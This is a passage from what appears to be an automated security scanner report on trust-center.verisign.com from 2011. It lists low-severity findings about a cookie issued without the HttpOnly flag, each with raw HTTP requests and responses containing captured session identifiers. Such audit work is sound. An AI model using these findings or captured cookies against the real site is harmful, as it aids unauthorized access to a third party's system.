Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:53 GMT
Server: Apache
Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 138732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
10.72. https://trust-center.verisign.com/process/retail/redirect
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/redirect
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:00 GMT
Server: Apache
Set-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
10.73. https://trust-center.verisign.com/process/retail/trust_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_initial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:26:31 GMT
Server: Apache
Set-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
10.74. https://trust-center.verisign.com/process/retail/trust_product_selector
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
...[SNIP]...
10.75. https://trust-center.verisign.com/process/retail/trust_product_selector.do
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:02 GMT
Server: Apache
Set-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
10.76. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/TeaLeafTarget.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /rcm/TeaLeafTarget.html HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Content-Length: 1103
X-TeaLeaf-Page-Objects: 0
Origin: https://trust-center.verisign.com
X-TeaLeaf-Page-Img-Fail: 1
X-TeaLeaf-Page-Render: 123
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

<ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" >
...[SNIP]...
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:10 GMT
Server: Apache
Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html> <body> OK </body> </html>
10.77. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/arrow_progressBar_gray.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 91
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif
10.78. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/arrow_progressBar_red.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 90
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif
10.79. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/divider.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/divider.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif
10.80. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/ico_questionmark.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 374
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...
10.81. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/logo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/logo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 16073
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...
10.82. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/popup_button_left.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 348 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....................................................................................................................................................................................................[SNIP]...
10.83. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/popup_button_right.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 344 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....................................................................................................................................................................................................[SNIP]...
10.84. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/pricebox_bg.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
